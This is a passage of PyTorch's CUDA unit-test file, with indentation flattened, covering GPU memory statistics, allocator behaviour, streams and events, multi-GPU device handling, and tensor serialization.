slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
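        # Rebuild the expected per-device allocator counters from torch.cuda.memory_snapshot() and compare them against torch.cuda.memory_stats().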
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.cuda.IntStorage))
q_copy[1].fill_(10)
self.assertTrue(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.cuda().double(), torch.cuda.DoubleTensor)
self.assertIsInstance(x.cuda().float(), torch.cuda.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu(), torch.FloatTensor)
self.assertIsInstance(x.cuda().float().cpu().int(), torch.IntTensor)
y = x.storage()
self.assertIsInstance(y.float(), torch.FloatStorage)
self.assertIsInstance(y.cuda().double(), torch.cuda.DoubleStorage)
self.assertIsInstance(y.cuda().float(), torch.cuda.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu(), torch.FloatStorage)
self.assertIsInstance(y.cuda().float().cpu().int(), torch.IntStorage)
@unittest.skip("was disabled due to not enough memory, but actually it always fail")
def test_arithmetic_large_tensor(self):
x = torch.empty(2**30, device='cuda')
x.fill_(1)
self.assertEqual(x.sum(), 2**30)
x += 1
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x -= 0.5
self.assertEqual(x.sum(), 2**29)
x.fill_(1)
x *= 2
self.assertEqual(x.sum(), 2**31)
x.fill_(1)
x /= 2
self.assertEqual(x.sum(), 2**29)
def test_gather_bool(self):
t = torch.tensor([[False, True], [True, True]], device='cuda')
self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
